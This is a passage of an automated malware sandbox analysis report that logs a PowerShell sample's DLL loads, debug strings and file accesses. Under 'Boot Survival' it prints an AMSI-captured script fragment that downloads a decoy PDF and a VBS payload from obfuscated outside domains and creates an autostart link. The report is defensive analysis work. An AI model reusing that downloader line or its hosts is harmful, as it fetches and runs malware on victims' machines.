      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1573793509.000001EEC714B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1446516271.000001B09D3C0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: gement.Automation.pdb9 source: powershell.exe, 00000003.00000002.1448213246.000001B09D60F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1678011340.000001EEE133C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1671504647.000001EEE1090000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.1678011340.000001EEE13D3000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32h source: powershell.exe, 00000000.00000002.1573793509.000001EEC714B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb: source: powershell.exe, 00000000.00000002.1678011340.000001EEE13D3000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: -n.pdb source: powershell.exe, 00000003.00000002.1449073605.000001B09D6DD000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.1678011340.000001EEE133C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1416881939.000001B08336F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 00000003.00000002.1449073605.000001B09D6DD000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: lib.pdbV source: powershell.exe, 00000000.00000002.1671504647.000001EEE1090000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb5 source: powershell.exe, 00000000.00000002.1671504647.000001EEE111D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: tomation.pdbh source: powershell.exe, 00000000.00000002.1671504647.000001EEE111D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdb source: powershell.exe, 00000000.00000002.1573793509.000001EEC714B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: pdbpdblib.pdbu source: powershell.exe, 00000000.00000002.1671504647.000001EEE1090000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF886C402FD push ds; iretd 0_2_00007FF886C403E2
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF886C40CC4 push ds; iretd 0_2_00007FF886C40CCA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF886C41A89 push ds; iretd 0_2_00007FF886C41A8A
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF886D1798B push edi; iretd 0_2_00007FF886D1798C
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF886D17F49 push ecx; iretd 0_2_00007FF886D17F4A
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF886D17C54 push esp; iretd 0_2_00007FF886D17C55
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF886C30B83 push ds; iretd 3_2_00007FF886C30B82
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF886C30B5D push ds; iretd 3_2_00007FF886C30B82
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF886C30605 push ds; iretd 3_2_00007FF886C3067A
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF886D00D6C push eax; ret 3_2_00007FF886D00D6D

      Boot Survival

      barindex
      Powershell creates an autostart link
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of Required items and services.pdf') -oulv 'htup9www.astznpntznprprisznps.com.pk/ms/List%20of%20rznpquirznpd%20itznpms%20and%20sznprvicznps.pdf';getit -fz $flol -oulv 'http://www.bluznpmaxxlasznpr.com/ms/ms.vbs';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help use

      Hooking and other Techniques for Hiding and Protection

      barindex
      Loading BitLocker PowerShell Module
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
